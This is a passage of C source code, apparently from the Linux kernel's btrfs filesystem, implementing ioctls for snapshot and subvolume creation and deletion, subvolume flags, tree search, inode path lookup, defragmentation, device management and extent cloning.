transid, readonly, inherit);
}
fdput(src);
}
out_drop_write:
mnt_drop_write_file(file);
out:
return ret;
}
static noinline int btrfs_ioctl_snap_create(struct file *file,
void __user *arg, int subvol)
{
struct btrfs_ioctl_vol_args *vol_args;
int ret;
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args))
return PTR_ERR(vol_args);
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
ret = btrfs_ioctl_snap_create_transid(file, vol_args->name,
vol_args->fd, subvol,
NULL, false, NULL);
kfree(vol_args);
return ret;
}
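/*
 * v2 of snapshot/subvolume creation: like the v1 ioctl, but with support
 * for async creation (returning the transid), read-only snapshots and
 * qgroup inheritance.
 */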
static noinline int btrfs_ioctl_snap_create_v2(struct file *file,
void __user *arg, int subvol)
{
struct btrfs_ioctl_vol_args_v2 *vol_args;
int ret;
u64 transid = 0;
u64 *ptr = NULL;
bool readonly = false;
struct btrfs_qgroup_inherit *inherit = NULL;
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args))
return PTR_ERR(vol_args);
vol_args->name[BTRFS_SUBVOL_NAME_MAX] = '\0';
if (vol_args->flags &
~(BTRFS_SUBVOL_CREATE_ASYNC | BTRFS_SUBVOL_RDONLY |
BTRFS_SUBVOL_QGROUP_INHERIT)) {
ret = -EOPNOTSUPP;
goto out;
}
if (vol_args->flags & BTRFS_SUBVOL_CREATE_ASYNC)
ptr = &transid;
if (vol_args->flags & BTRFS_SUBVOL_RDONLY)
readonly = true;
if (vol_args->flags & BTRFS_SUBVOL_QGROUP_INHERIT) {
if (vol_args->size > PAGE_CACHE_SIZE) {
ret = -EINVAL;
goto out;
}
inherit = memdup_user(vol_args->qgroup_inherit, vol_args->size);
if (IS_ERR(inherit)) {
ret = PTR_ERR(inherit);
goto out;
}
}
ret = btrfs_ioctl_snap_create_transid(file, vol_args->name,
vol_args->fd, subvol, ptr,
readonly, &inherit);
if (ret == 0 && ptr &&
copy_to_user(arg +
offsetof(struct btrfs_ioctl_vol_args_v2,
transid), ptr, sizeof(*ptr)))
ret = -EFAULT;
out:
kfree(vol_args);
kfree(inherit);
return ret;
}
static noinline int btrfs_ioctl_subvol_getflags(struct file *file,
void __user *arg)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
int ret = 0;
u64 flags = 0;
if (btrfs_ino(inode) != BTRFS_FIRST_FREE_OBJECTID)
return -EINVAL;
down_read(&root->fs_info->subvol_sem);
if (btrfs_root_readonly(root))
flags |= BTRFS_SUBVOL_RDONLY;
up_read(&root->fs_info->subvol_sem);
if (copy_to_user(arg, &flags, sizeof(flags)))
ret = -EFAULT;
return ret;
}
static noinline int btrfs_ioctl_subvol_setflags(struct file *file,
void __user *arg)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_trans_handle *trans;
u64 root_flags;
u64 flags;
int ret = 0;
ret = mnt_want_write_file(file);
if (ret)
goto out;
if (btrfs_ino(inode) != BTRFS_FIRST_FREE_OBJECTID) {
ret = -EINVAL;
goto out_drop_write;
}
if (copy_from_user(&flags, arg, sizeof(flags))) {
ret = -EFAULT;
goto out_drop_write;
}
if (flags & BTRFS_SUBVOL_CREATE_ASYNC) {
ret = -EINVAL;
goto out_drop_write;
}
if (flags & ~BTRFS_SUBVOL_RDONLY) {
ret = -EOPNOTSUPP;
goto out_drop_write;
}
if (!inode_owner_or_capable(inode)) {
ret = -EACCES;
goto out_drop_write;
}
down_write(&root->fs_info->subvol_sem);
/* nothing to do */
if (!!(flags & BTRFS_SUBVOL_RDONLY) == btrfs_root_readonly(root))
goto out_drop_sem;
root_flags = btrfs_root_flags(&root->root_item);
if (flags & BTRFS_SUBVOL_RDONLY)
btrfs_set_root_flags(&root->root_item,
root_flags | BTRFS_ROOT_SUBVOL_RDONLY);
else
btrfs_set_root_flags(&root->root_item,
root_flags & ~BTRFS_ROOT_SUBVOL_RDONLY);
trans = btrfs_start_transaction(root, 1);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out_reset;
}
ret = btrfs_update_root(trans, root->fs_info->tree_root,
&root->root_key, &root->root_item);
btrfs_commit_transaction(trans, root);
out_reset:
if (ret)
btrfs_set_root_flags(&root->root_item, root_flags);
out_drop_sem:
up_write(&root->fs_info->subvol_sem);
out_drop_write:
mnt_drop_write_file(file);
out:
return ret;
}
/*
* helper to check if the subvolume references other subvolumes
*/
static noinline int may_destroy_subvol(struct btrfs_root *root)
{
struct btrfs_path *path;
struct btrfs_key key;
int ret;
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
key.objectid = root->root_key.objectid;
key.type = BTRFS_ROOT_REF_KEY;
key.offset = (u64)-1;
ret = btrfs_search_slot(NULL, root->fs_info->tree_root,
&key, path, 0, 0);
if (ret < 0)
goto out;
BUG_ON(ret == 0);
ret = 0;
if (path->slots[0] > 0) {
path->slots[0]--;
btrfs_item_key_to_cpu(path->nodes[0], &key, path->slots[0]);
if (key.objectid == root->root_key.objectid &&
key.type == BTRFS_ROOT_REF_KEY)
ret = -ENOTEMPTY;
}
out:
btrfs_free_path(path);
return ret;
}
static noinline int key_in_sk(struct btrfs_key *key,
struct btrfs_ioctl_search_key *sk)
{
struct btrfs_key test;
int ret;
test.objectid = sk->min_objectid;
test.type = sk->min_type;
test.offset = sk->min_offset;
ret = btrfs_comp_cpu_keys(key, &test);
if (ret < 0)
return 0;
test.objectid = sk->max_objectid;
test.type = sk->max_type;
test.offset = sk->max_offset;
ret = btrfs_comp_cpu_keys(key, &test);
if (ret > 0)
return 0;
return 1;
}
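/*
 * Copy the items of the current leaf that fall inside the search key
 * range into the result buffer, each preceded by a
 * btrfs_ioctl_search_header, then advance @key to the next position to
 * continue the search from.
 */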
static noinline int copy_to_sk(struct btrfs_root *root,
struct btrfs_path *path,
struct btrfs_key *key,
struct btrfs_ioctl_search_key *sk,
char *buf,
unsigned long *sk_offset,
int *num_found)
{
u64 found_transid;
struct extent_buffer *leaf;
struct btrfs_ioctl_search_header sh;
unsigned long item_off;
unsigned long item_len;
int nritems;
int i;
int slot;
int ret = 0;
leaf = path->nodes[0];
slot = path->slots[0];
nritems = btrfs_header_nritems(leaf);
if (btrfs_header_generation(leaf) > sk->max_transid) {
i = nritems;
goto advance_key;
}
found_transid = btrfs_header_generation(leaf);
for (i = slot; i < nritems; i++) {
item_off = btrfs_item_ptr_offset(leaf, i);
item_len = btrfs_item_size_nr(leaf, i);
if (item_len > BTRFS_SEARCH_ARGS_BUFSIZE)
item_len = 0;
if (sizeof(sh) + item_len + *sk_offset >
BTRFS_SEARCH_ARGS_BUFSIZE) {
ret = 1;
goto overflow;
}
btrfs_item_key_to_cpu(leaf, key, i);
if (!key_in_sk(key, sk))
continue;
sh.objectid = key->objectid;
sh.offset = key->offset;
sh.type = key->type;
sh.len = item_len;
sh.transid = found_transid;
/* copy search result header */
memcpy(buf + *sk_offset, &sh, sizeof(sh));
*sk_offset += sizeof(sh);
if (item_len) {
char *p = buf + *sk_offset;
/* copy the item */
read_extent_buffer(leaf, p,
item_off, item_len);
*sk_offset += item_len;
}
(*num_found)++;
if (*num_found >= sk->nr_items)
break;
}
advance_key:
ret = 0;
if (key->offset < (u64)-1 && key->offset < sk->max_offset)
key->offset++;
else if (key->type < (u8)-1 && key->type < sk->max_type) {
key->offset = 0;
key->type++;
} else if (key->objectid < (u64)-1 && key->objectid < sk->max_objectid) {
key->offset = 0;
key->type = 0;
key->objectid++;
} else
ret = 1;
overflow:
return ret;
}
static noinline int search_ioctl(struct inode *inode,
struct btrfs_ioctl_search_args *args)
{
struct btrfs_root *root;
struct btrfs_key key;
struct btrfs_key max_key;
struct btrfs_path *path;
struct btrfs_ioctl_search_key *sk = &args->key;
struct btrfs_fs_info *info = BTRFS_I(inode)->root->fs_info;
int ret;
int num_found = 0;
unsigned long sk_offset = 0;
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
if (sk->tree_id == 0) {
/* search the root of the inode that was passed */
root = BTRFS_I(inode)->root;
} else {
key.objectid = sk->tree_id;
key.type = BTRFS_ROOT_ITEM_KEY;
key.offset = (u64)-1;
root = btrfs_read_fs_root_no_name(info, &key);
if (IS_ERR(root)) {
printk(KERN_ERR "could not find root %llu\n",
sk->tree_id);
btrfs_free_path(path);
return -ENOENT;
}
}
key.objectid = sk->min_objectid;
key.type = sk->min_type;
key.offset = sk->min_offset;
max_key.objectid = sk->max_objectid;
max_key.type = sk->max_type;
max_key.offset = sk->max_offset;
path->keep_locks = 1;
while(1) {
ret = btrfs_search_forward(root, &key, &max_key, path, 0,
sk->min_transid);
if (ret != 0) {
if (ret > 0)
ret = 0;
goto err;
}
ret = copy_to_sk(root, path, &key, sk, args->buf,
&sk_offset, &num_found);
btrfs_release_path(path);
if (ret || num_found >= sk->nr_items)
break;
}
ret = 0;
err:
sk->nr_items = num_found;
btrfs_free_path(path);
return ret;
}
static noinline int btrfs_ioctl_tree_search(struct file *file,
void __user *argp)
{
struct btrfs_ioctl_search_args *args;
struct inode *inode;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
args = memdup_user(argp, sizeof(*args));
if (IS_ERR(args))
return PTR_ERR(args);
inode = fdentry(file)->d_inode;
ret = search_ioctl(inode, args);
if (ret == 0 && copy_to_user(argp, args, sizeof(*args)))
ret = -EFAULT;
kfree(args);
return ret;
}
/*
* Search INODE_REFs to identify the path name of the 'dirid' directory
* in a 'tree_id' tree, and store that path name in 'name'.
*/
static noinline int btrfs_search_path_in_tree(struct btrfs_fs_info *info,
u64 tree_id, u64 dirid, char *name)
{
struct btrfs_root *root;
struct btrfs_key key;
char *ptr;
int ret = -1;
int slot;
int len;
int total_len = 0;
struct btrfs_inode_ref *iref;
struct extent_buffer *l;
struct btrfs_path *path;
if (dirid == BTRFS_FIRST_FREE_OBJECTID) {
name[0]='\0';
return 0;
}
path = btrfs_alloc_path();
if (!path)
return -ENOMEM;
ptr = &name[BTRFS_INO_LOOKUP_PATH_MAX];
key.objectid = tree_id;
key.type = BTRFS_ROOT_ITEM_KEY;
key.offset = (u64)-1;
root = btrfs_read_fs_root_no_name(info, &key);
if (IS_ERR(root)) {
printk(KERN_ERR "could not find root %llu\n", tree_id);
ret = -ENOENT;
goto out;
}
key.objectid = dirid;
key.type = BTRFS_INODE_REF_KEY;
key.offset = (u64)-1;
while(1) {
ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
if (ret < 0)
goto out;
l = path->nodes[0];
slot = path->slots[0];
if (ret > 0 && slot > 0)
slot--;
btrfs_item_key_to_cpu(l, &key, slot);
if (ret > 0 && (key.objectid != dirid ||
key.type != BTRFS_INODE_REF_KEY)) {
ret = -ENOENT;
goto out;
}
iref = btrfs_item_ptr(l, slot, struct btrfs_inode_ref);
len = btrfs_inode_ref_name_len(l, iref);
ptr -= len + 1;
total_len += len + 1;
if (ptr < name)
goto out;
*(ptr + len) = '/';
read_extent_buffer(l, ptr,(unsigned long)(iref + 1), len);
if (key.offset == BTRFS_FIRST_FREE_OBJECTID)
break;
btrfs_release_path(path);
key.objectid = key.offset;
key.offset = (u64)-1;
dirid = key.objectid;
}
if (ptr < name)
goto out;
memmove(name, ptr, total_len);
name[total_len]='\0';
ret = 0;
out:
btrfs_free_path(path);
return ret;
}
static noinline int btrfs_ioctl_ino_lookup(struct file *file,
void __user *argp)
{
struct btrfs_ioctl_ino_lookup_args *args;
struct inode *inode;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
args = memdup_user(argp, sizeof(*args));
if (IS_ERR(args))
return PTR_ERR(args);
inode = fdentry(file)->d_inode;
if (args->treeid == 0)
args->treeid = BTRFS_I(inode)->root->root_key.objectid;
ret = btrfs_search_path_in_tree(BTRFS_I(inode)->root->fs_info,
args->treeid, args->objectid,
args->name);
if (ret == 0 && copy_to_user(argp, args, sizeof(*args)))
ret = -EFAULT;
kfree(args);
return ret;
}
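/*
 * BTRFS_IOC_SNAP_DESTROY: unlink a snapshot or subvolume from its parent
 * directory and mark its root for deletion.  Non-root users may only do
 * this with the USER_SUBVOL_RM_ALLOWED mount option and when the usual
 * rmdir-style permission checks pass.
 */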
static noinline int btrfs_ioctl_snap_destroy(struct file *file,
void __user *arg)
{
struct dentry *parent = fdentry(file);
struct dentry *dentry;
struct inode *dir = parent->d_inode;
struct inode *inode;
struct btrfs_root *root = BTRFS_I(dir)->root;
struct btrfs_root *dest = NULL;
struct btrfs_ioctl_vol_args *vol_args;
struct btrfs_trans_handle *trans;
int namelen;
int ret;
int err = 0;
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args))
return PTR_ERR(vol_args);
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
namelen = strlen(vol_args->name);
if (strchr(vol_args->name, '/') ||
strncmp(vol_args->name, "..", namelen) == 0) {
err = -EINVAL;
goto out;
}
err = mnt_want_write_file(file);
if (err)
goto out;
mutex_lock_nested(&dir->i_mutex, I_MUTEX_PARENT);
dentry = lookup_one_len(vol_args->name, parent, namelen);
if (IS_ERR(dentry)) {
err = PTR_ERR(dentry);
goto out_unlock_dir;
}
if (!dentry->d_inode) {
err = -ENOENT;
goto out_dput;
}
inode = dentry->d_inode;
dest = BTRFS_I(inode)->root;
if (!capable(CAP_SYS_ADMIN)){
/*
* Regular user. Only allow this with a special mount
* option, when the user has write+exec access to the
* subvol root, and when rmdir(2) would have been
* allowed.
*
* Note that this is _not_ a check that the subvol is
* empty or doesn't contain data that we wouldn't
* otherwise be able to delete.
*
* Users who want to delete empty subvols should try
* rmdir(2).
*/
err = -EPERM;
if (!btrfs_test_opt(root, USER_SUBVOL_RM_ALLOWED))
goto out_dput;
/*
* Do not allow deletion if the parent dir is the same
* as the dir to be deleted. That means the ioctl
* must be called on the dentry referencing the root
* of the subvol, not a random directory contained
* within it.
*/
err = -EINVAL;
if (root == dest)
goto out_dput;
err = inode_permission(inode, MAY_WRITE | MAY_EXEC);
if (err)
goto out_dput;
/* check if subvolume may be deleted by a non-root user */
err = btrfs_may_delete(dir, dentry, 1);
if (err)
goto out_dput;
}
if (btrfs_ino(inode) != BTRFS_FIRST_FREE_OBJECTID) {
err = -EINVAL;
goto out_dput;
}
mutex_lock(&inode->i_mutex);
err = d_invalidate(dentry);
if (err)
goto out_unlock;
down_write(&root->fs_info->subvol_sem);
err = may_destroy_subvol(dest);
if (err)
goto out_up_write;
trans = btrfs_start_transaction(root, 0);
if (IS_ERR(trans)) {
err = PTR_ERR(trans);
goto out_up_write;
}
trans->block_rsv = &root->fs_info->global_block_rsv;
ret = btrfs_unlink_subvol(trans, root, dir,
dest->root_key.objectid,
dentry->d_name.name,
dentry->d_name.len);
if (ret) {
err = ret;
btrfs_abort_transaction(trans, root, ret);
goto out_end_trans;
}
btrfs_record_root_in_trans(trans, dest);
memset(&dest->root_item.drop_progress, 0,
sizeof(dest->root_item.drop_progress));
dest->root_item.drop_level = 0;
btrfs_set_root_refs(&dest->root_item, 0);
if (!xchg(&dest->orphan_item_inserted, 1)) {
ret = btrfs_insert_orphan_item(trans,
root->fs_info->tree_root,
dest->root_key.objectid);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
err = ret;
goto out_end_trans;
}
}
out_end_trans:
ret = btrfs_end_transaction(trans, root);
if (ret && !err)
err = ret;
inode->i_flags |= S_DEAD;
out_up_write:
up_write(&root->fs_info->subvol_sem);
out_unlock:
mutex_unlock(&inode->i_mutex);
if (!err) {
shrink_dcache_sb(root->fs_info->sb);
btrfs_invalidate_inodes(dest);
d_delete(dentry);
}
out_dput:
dput(dentry);
out_unlock_dir:
mutex_unlock(&dir->i_mutex);
mnt_drop_write_file(file);
out:
kfree(vol_args);
return err;
}
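/*
 * BTRFS_IOC_DEFRAG[_RANGE]: defragment either the metadata trees (when
 * called on a directory; requires CAP_SYS_ADMIN) or the data of the
 * given file range.
 */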
static int btrfs_ioctl_defrag(struct file *file, void __user *argp)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct btrfs_ioctl_defrag_range_args *range;
int ret;
if (btrfs_root_readonly(root))
return -EROFS;
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
return -EINPROGRESS;
}
ret = mnt_want_write_file(file);
if (ret) {
atomic_set(&root->fs_info->mutually_exclusive_operation_running,
0);
return ret;
}
switch (inode->i_mode & S_IFMT) {
case S_IFDIR:
if (!capable(CAP_SYS_ADMIN)) {
ret = -EPERM;
goto out;
}
ret = btrfs_defrag_root(root, 0);
if (ret)
goto out;
ret = btrfs_defrag_root(root->fs_info->extent_root, 0);
break;
case S_IFREG:
if (!(file->f_mode & FMODE_WRITE)) {
ret = -EINVAL;
goto out;
}
range = kzalloc(sizeof(*range), GFP_KERNEL);
if (!range) {
ret = -ENOMEM;
goto out;
}
if (argp) {
if (copy_from_user(range, argp,
sizeof(*range))) {
ret = -EFAULT;
kfree(range);
goto out;
}
/* compression requires us to start the IO */
if ((range->flags & BTRFS_DEFRAG_RANGE_COMPRESS)) {
range->flags |= BTRFS_DEFRAG_RANGE_START_IO;
range->extent_thresh = (u32)-1;
}
} else {
/* the rest are all set to zero by kzalloc */
range->len = (u64)-1;
}
ret = btrfs_defrag_file(fdentry(file)->d_inode, file,
range, 0, 0);
if (ret > 0)
ret = 0;
kfree(range);
break;
default:
ret = -EINVAL;
}
out:
mnt_drop_write_file(file);
atomic_set(&root->fs_info->mutually_exclusive_operation_running, 0);
return ret;
}
static long btrfs_ioctl_add_dev(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_vol_args *vol_args;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
return -EINPROGRESS;
}
mutex_lock(&root->fs_info->volume_mutex);
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args)) {
ret = PTR_ERR(vol_args);
goto out;
}
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
ret = btrfs_init_new_device(root, vol_args->name);
kfree(vol_args);
out:
mutex_unlock(&root->fs_info->volume_mutex);
atomic_set(&root->fs_info->mutually_exclusive_operation_running, 0);
return ret;
}
static long btrfs_ioctl_rm_dev(struct file *file, void __user *arg)
{
struct btrfs_root *root = BTRFS_I(fdentry(file)->d_inode)->root;
struct btrfs_ioctl_vol_args *vol_args;
int ret;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
ret = mnt_want_write_file(file);
if (ret)
return ret;
if (atomic_xchg(&root->fs_info->mutually_exclusive_operation_running,
1)) {
pr_info("btrfs: dev add/delete/balance/replace/resize operation in progress\n");
mnt_drop_write_file(file);
return -EINPROGRESS;
}
mutex_lock(&root->fs_info->volume_mutex);
vol_args = memdup_user(arg, sizeof(*vol_args));
if (IS_ERR(vol_args)) {
ret = PTR_ERR(vol_args);
goto out;
}
vol_args->name[BTRFS_PATH_NAME_MAX] = '\0';
ret = btrfs_rm_device(root, vol_args->name);
kfree(vol_args);
out:
mutex_unlock(&root->fs_info->volume_mutex);
mnt_drop_write_file(file);
atomic_set(&root->fs_info->mutually_exclusive_operation_running, 0);
return ret;
}
static long btrfs_ioctl_fs_info(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_fs_info_args *fi_args;
struct btrfs_device *device;
struct btrfs_device *next;
struct btrfs_fs_devices *fs_devices = root->fs_info->fs_devices;
int ret = 0;
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
fi_args = kzalloc(sizeof(*fi_args), GFP_KERNEL);
if (!fi_args)
return -ENOMEM;
fi_args->num_devices = fs_devices->num_devices;
memcpy(&fi_args->fsid, root->fs_info->fsid, sizeof(fi_args->fsid));
mutex_lock(&fs_devices->device_list_mutex);
list_for_each_entry_safe(device, next, &fs_devices->devices, dev_list) {
if (device->devid > fi_args->max_id)
fi_args->max_id = device->devid;
}
mutex_unlock(&fs_devices->device_list_mutex);
if (copy_to_user(arg, fi_args, sizeof(*fi_args)))
ret = -EFAULT;
kfree(fi_args);
return ret;
}
static long btrfs_ioctl_dev_info(struct btrfs_root *root, void __user *arg)
{
struct btrfs_ioctl_dev_info_args *di_args;
struct btrfs_device *dev;
struct btrfs_fs_devices *fs_devices = root->fs_info->fs_devices;
int ret = 0;
char *s_uuid = NULL;
char empty_uuid[BTRFS_UUID_SIZE] = {0};
if (!capable(CAP_SYS_ADMIN))
return -EPERM;
di_args = memdup_user(arg, sizeof(*di_args));
if (IS_ERR(di_args))
return PTR_ERR(di_args);
if (memcmp(empty_uuid, di_args->uuid, BTRFS_UUID_SIZE) != 0)
s_uuid = di_args->uuid;
mutex_lock(&fs_devices->device_list_mutex);
dev = btrfs_find_device(root->fs_info, di_args->devid, s_uuid, NULL);
mutex_unlock(&fs_devices->device_list_mutex);
if (!dev) {
ret = -ENODEV;
goto out;
}
di_args->devid = dev->devid;
di_args->bytes_used = dev->bytes_used;
di_args->total_bytes = dev->total_bytes;
memcpy(di_args->uuid, dev->uuid, sizeof(di_args->uuid));
if (dev->name) {
struct rcu_string *name;
rcu_read_lock();
name = rcu_dereference(dev->name);
strncpy(di_args->path, name->str, sizeof(di_args->path));
rcu_read_unlock();
di_args->path[sizeof(di_args->path) - 1] = 0;
} else {
di_args->path[0] = '\0';
}
out:
if (ret == 0 && copy_to_user(arg, di_args, sizeof(*di_args)))
ret = -EFAULT;
kfree(di_args);
return ret;
}
static noinline long btrfs_ioctl_clone(struct file *file, unsigned long srcfd,
u64 off, u64 olen, u64 destoff)
{
struct inode *inode = fdentry(file)->d_inode;
struct btrfs_root *root = BTRFS_I(inode)->root;
struct fd src_file;
struct inode *src;
struct btrfs_trans_handle *trans;
struct btrfs_path *path;
struct extent_buffer *leaf;
char *buf;
struct btrfs_key key;
u32 nritems;
int slot;
int ret;
u64 len = olen;
u64 bs = root->fs_info->sb->s_blocksize;
/*
* TODO:
* - split compressed inline extents. annoying: we need to
* decompress into destination's address_space (the file offset
* may change, so source mapping won't do), then recompress (or
* otherwise reinsert) a subrange.
* - allow ranges within the same file to be cloned (provided
* they don't overlap)?
*/
/* the destination must be opened for writing */
if (!(file->f_mode & FMODE_WRITE) || (file->f_flags & O_APPEND))
return -EINVAL;
if (btrfs_root_readonly(root))
return -EROFS;
ret = mnt_want_write_file(file);
if (ret)
return ret;
src_file = fdget(srcfd);
if (!src_file.file) {
ret = -EBADF;
goto out_drop_write;
}
ret = -EXDEV;
if (src_file.file->f_path.mnt != file->f_path.mnt)
goto out_fput;
src = src_file.file->f_dentry->d_inode;
ret = -EINVAL;
if (src == inode)
goto out_fput;
/* the src must be open for reading */
if (!(src_file.file->f_mode & FMODE_READ))
goto out_fput;
/* don't make the dst file partly checksummed */
if ((BTRFS_I(src)->flags & BTRFS_INODE_NODATASUM) !=
(BTRFS_I(inode)->flags & BTRFS_INODE_NODATASUM))
goto out_fput;
ret = -EISDIR;
if (S_ISDIR(src->i_mode) || S_ISDIR(inode->i_mode))
goto out_fput;
ret = -EXDEV;
if (src->i_sb != inode->i_sb)
goto out_fput;
ret = -ENOMEM;
buf = vmalloc(btrfs_level_size(root, 0));
if (!buf)
goto out_fput;
path = btrfs_alloc_path();
if (!path) {
vfree(buf);
goto out_fput;
}
path->reada = 2;
if (inode < src) {
mutex_lock_nested(&inode->i_mutex, I_MUTEX_PARENT);
mutex_lock_nested(&src->i_mutex, I_MUTEX_CHILD);
} else {
mutex_lock_nested(&src->i_mutex, I_MUTEX_PARENT);
mutex_lock_nested(&inode->i_mutex, I_MUTEX_CHILD);
}
/* determine range to clone */
ret = -EINVAL;
if (off + len > src->i_size || off + len < off)
goto out_unlock;
if (len == 0)
olen = len = src->i_size - off;
/* if we extend to eof, continue to block boundary */
if (off + len == src->i_size)
len = ALIGN(src->i_size, bs) - off;
/* verify the end result is block aligned */
if (!IS_ALIGNED(off, bs) || !IS_ALIGNED(off + len, bs) ||
!IS_ALIGNED(destoff, bs))
goto out_unlock;
if (destoff > inode->i_size) {
ret = btrfs_cont_expand(inode, inode->i_size, destoff);
if (ret)
goto out_unlock;
}
/* truncate page cache pages from target inode range */
truncate_inode_pages_range(&inode->i_data, destoff,
PAGE_CACHE_ALIGN(destoff + len) - 1);
/* do any pending delalloc/csum calc on src, one way or
another, and lock file content */
while (1) {
struct btrfs_ordered_extent *ordered;
lock_extent(&BTRFS_I(src)->io_tree, off, off + len - 1);
ordered = btrfs_lookup_first_ordered_extent(src, off + len - 1);
if (!ordered &&
!test_range_bit(&BTRFS_I(src)->io_tree, off, off + len - 1,
EXTENT_DELALLOC, 0, NULL))
break;
unlock_extent(&BTRFS_I(src)->io_tree, off, off + len - 1);
if (ordered)
btrfs_put_ordered_extent(ordered);
btrfs_wait_ordered_range(src, off, len);
}
/* clone data */
key.objectid = btrfs_ino(src);
key.type = BTRFS_EXTENT_DATA_KEY;
key.offset = 0;
while (1) {
/*
* note the key will change type as we walk through the
* tree.
*/
ret = btrfs_search_slot(NULL, BTRFS_I(src)->root, &key, path,
0, 0);
if (ret < 0)
goto out;
nritems = btrfs_header_nritems(path->nodes[0]);
if (path->slots[0] >= nritems) {
ret = btrfs_next_leaf(BTRFS_I(src)->root, path);
if (ret < 0)
goto out;
if (ret > 0)
break;
nritems = btrfs_header_nritems(path->nodes[0]);
}
leaf = path->nodes[0];
slot = path->slots[0];
btrfs_item_key_to_cpu(leaf, &key, slot);
if (btrfs_key_type(&key) > BTRFS_EXTENT_DATA_KEY ||
key.objectid != btrfs_ino(src))
break;
if (btrfs_key_type(&key) == BTRFS_EXTENT_DATA_KEY) {
struct btrfs_file_extent_item *extent;
int type;
u32 size;
struct btrfs_key new_key;
u64 disko = 0, diskl = 0;
u64 datao = 0, datal = 0;
u8 comp;
u64 endoff;
size = btrfs_item_size_nr(leaf, slot);
read_extent_buffer(leaf, buf,
btrfs_item_ptr_offset(leaf, slot),
size);
extent = btrfs_item_ptr(leaf, slot,
struct btrfs_file_extent_item);
comp = btrfs_file_extent_compression(leaf, extent);
type = btrfs_file_extent_type(leaf, extent);
if (type == BTRFS_FILE_EXTENT_REG ||
type == BTRFS_FILE_EXTENT_PREALLOC) {
disko = btrfs_file_extent_disk_bytenr(leaf,
extent);
diskl = btrfs_file_extent_disk_num_bytes(leaf,
extent);
datao = btrfs_file_extent_offset(leaf, extent);
datal = btrfs_file_extent_num_bytes(leaf,
extent);
} else if (type == BTRFS_FILE_EXTENT_INLINE) {
/* take upper bound, may be compressed */
datal = btrfs_file_extent_ram_bytes(leaf,
extent);
}
btrfs_release_path(path);
if (key.offset + datal <= off ||
key.offset >= off + len - 1)
goto next;
memcpy(&new_key, &key, sizeof(new_key));
new_key.objectid = btrfs_ino(inode);
if (off <= key.offset)
new_key.offset = key.offset + destoff - off;
else
new_key.offset = destoff;
/*
* 1 - adjusting old extent (we may have to split it)
* 1 - add new extent
* 1 - inode update
*/
trans = btrfs_start_transaction(root, 3);
if (IS_ERR(trans)) {
ret = PTR_ERR(trans);
goto out;
}
if (type == BTRFS_FILE_EXTENT_REG ||
type == BTRFS_FILE_EXTENT_PREALLOC) {
/*
* a | --- range to clone ---| b
* | ------------- extent ------------- |
*/
/* subtract range b */
if (key.offset + datal > off + len)
datal = off + len - key.offset;
/* subtract range a */
if (off > key.offset) {
datao += off - key.offset;
datal -= off - key.offset;
}
ret = btrfs_drop_extents(trans, root, inode,
new_key.offset,
new_key.offset + datal,
1);
if (ret) {
btrfs_abort_transaction(trans, root,
ret);
btrfs_end_transaction(trans, root);
goto out;
}
ret = btrfs_insert_empty_item(trans, root, path,
&new_key, size);
if (ret) {
btrfs_abort_transaction(trans, root,
ret);
btrfs_end_transaction(trans, root);
goto out;
}
leaf = path->nodes[0];
slot = path->slots[0];
write_extent_buffer(leaf, buf,
btrfs_item_ptr_offset(leaf, slot),
size);
extent = btrfs_item_ptr(leaf, slot,
struct btrfs_file_extent_item);
/* disko == 0 means it's a hole */
if (!disko)
datao = 0;
btrfs_set_file_extent_offset(leaf, extent,
datao);
btrfs_set_file_extent_num_bytes(leaf, extent,
datal);
if (disko) {
inode_add_bytes(inode, datal);
ret = btrfs_inc_extent_ref(trans, root,
disko, diskl, 0,
root->root_key.objectid,
btrfs_ino(inode),
new_key.offset - datao,
0);
if (ret) {
btrfs_abort_transaction(trans,
root,
ret);
btrfs_end_transaction(trans,
root);
goto out;
}
}
} else if (type == BTRFS_FILE_EXTENT_INLINE) {
u64 skip = 0;
u64 trim = 0;
if (off > key.offset) {
skip = off - key.offset;
new_key.offset += skip;
}
if (key.offset + datal > off + len)
trim = key.offset + datal - (off + len);
if (comp && (skip || trim)) {
ret = -EINVAL;
btrfs_end_transaction(trans, root);
goto out;
}
size -= skip + trim;
datal -= skip + trim;
ret = btrfs_drop_extents(trans, root, inode,
new_key.offset,
new_key.offset + datal,
1);
if (ret) {
btrfs_abort_transaction(trans, root,
ret);
btrfs_end_transaction(trans, root);
goto out;
}
ret = btrfs_insert_empty_item(trans, root, path,
&new_key, size);
if (ret) {
btrfs_abort_transaction(trans, root,
ret);
btrfs_end_transaction(trans, root);
goto out;
}
if (skip) {
u32 start =
btrfs_file_extent_calc_inline_size(0);
memmove(buf+start, buf+start+skip,
datal);
}
leaf = path->nodes[0];
slot = path->slots[0];
write_extent_buffer(leaf, buf,
btrfs_item_ptr_offset(leaf, slot),
size);
inode_add_bytes(inode, datal);
}
btrfs_mark_buffer_dirty(leaf);
btrfs_release_path(path);
inode_inc_iversion(inode);
